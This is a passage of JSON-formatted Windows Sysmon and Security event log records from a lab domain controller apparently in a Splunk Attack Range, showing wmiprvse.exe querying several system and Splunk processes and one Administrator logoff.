C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.581","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5908,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.581\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nTargetProcessId: 4448\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.581","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","TargetProcessId":"4448","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5909,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.581\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1FFB-5F25-0000-0010E3B20500}\r\nTargetProcessId: 3916\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.581","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1FFB-5F25-0000-0010E3B20500}","TargetProcessId":"3916","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5910,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.581\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-2001-5F25-0000-0010C9D80500}\r\nTargetProcessId: 4596\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.581","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-2001-5F25-0000-0010C9D80500}","TargetProcessId":"4596","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5911,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.581\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-00105D520800}\r\nTargetProcessId: 3592\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.581","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-00105D520800}","TargetProcessId":"3592","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220654,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7F49E\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7f49e","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5912,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.581\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-00101E540800}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.581","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-00101E540800}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5913,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.581\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-0010DBE10800}\r\nTargetProcessId: 2124\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.581","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-0010DBE10800}","TargetProcessId":"2124","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
